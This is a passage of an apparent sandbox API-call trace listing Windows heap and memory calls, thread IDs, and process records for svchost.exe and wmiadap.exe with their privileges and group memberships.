hHeap=0x250000, dwFlags=0x0, lpMem=0x2719b0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2719d0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2719f0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271a10 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271a30 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271a50 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271a70 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271a90 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271ab0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271ad0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271af0 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271b10 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271b30 | out: hHeap=0x250000) returned 1 [0196.281] GetProcessHeap () returned 0x250000 [0196.281] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271b50 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271b70 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271b90 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271bb0 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271bd0 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271bf0 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271c10 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271c30 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271c50 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271c70 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271c90 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271cb0 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271cd0 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271cf0 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271d10 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271d30 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271d50 | out: hHeap=0x250000) returned 1 [0196.282] GetProcessHeap () returned 0x250000 [0196.282] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271d70 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271d90 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271db0 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271dd0 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271df0 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271e10 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271e30 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271e50 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271e70 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271e90 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271eb0 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271ed0 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271ef0 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271f10 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271f30 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.283] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271f50 | out: hHeap=0x250000) returned 1 [0196.283] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271f70 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271f90 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271fb0 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271fd0 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x271ff0 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272010 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272030 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272090 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2720b0 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2720d0 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2720f0 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272110 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272130 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272150 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272170 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.284] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272190 | out: hHeap=0x250000) returned 1 [0196.284] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2721b0 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2721d0 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2721f0 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272210 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272230 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272250 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272270 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272290 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2722b0 | out: hHeap=0x250000) returned 1 [0196.285] GetProcessHeap () returned 0x250000 [0196.285] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2722d0 | out: hHeap=0x250000) returned 1 [0196.285] exit (_Code=0) Thread: id = 175 os_tid = 0x320 Thread: id = 192 os_tid = 0x614 Thread: id = 193 os_tid = 0x6cc Thread: id = 194 os_tid = 0x5f4 Thread: id = 195 os_tid = 0xa20 [0194.953] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2c5820 [0194.954] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2d6b60 [0194.954] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x28e4f0 [0194.954] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2dd770 [0194.954] LocalReAlloc (hMem=0x28e4f0, uBytes=0x20, uFlags=0x2) returned 0x2af3e0 [0194.958] LocalFree (hMem=0x2c5820) returned 0x0 [0194.960] LocalFree (hMem=0x2dd770) returned 0x0 [0194.960] LocalFree (hMem=0x2af3e0) returned 0x0 [0194.960] LocalFree (hMem=0x2d6b60) returned 0x0 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 237 os_tid = 0x520 Thread: id = 238 os_tid = 0x978 Thread: id = 239 os_tid = 0x818 Thread: id = 240 os_tid = 0xacc Thread: id = 241 os_tid = 0x7b8 Thread: id = 242 os_tid = 0x5e0 Thread: id = 243 os_tid = 0x5bc Thread: id = 244 os_tid = 0x5f8 Thread: id = 245 os_tid = 0x5f0 Thread: id = 246 os_tid = 0x5ec Thread: id = 247 os_tid = 0x5d0 Thread: id = 248 os_tid = 0x12c Thread: id = 249 os_tid = 0x170 Thread: id = 250 os_tid = 0x3c0 Thread: id = 251 os_tid = 0x3b8 Thread: id = 252 os_tid = 0x3a8 Thread: id = 253 os_tid = 0x2fc Thread: id = 254 os_tid = 0x2f8 Thread: id = 255 os_tid = 0x2d4 Thread: id = 256 os_tid = 0x2cc Thread: id = 270 os_tid = 0xd4 Process: id = "16" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x62f5c000" os_pid = "0x5f4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xe], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 257 os_tid = 0x314 Thread: id = 258 os_tid = 0x5cc Thread: id = 259 os_tid = 0xa70 Thread: id = 260 os_tid = 0x248 Thread: id = 261 os_tid = 0x6cc Thread: id = 262 os_tid = 0x320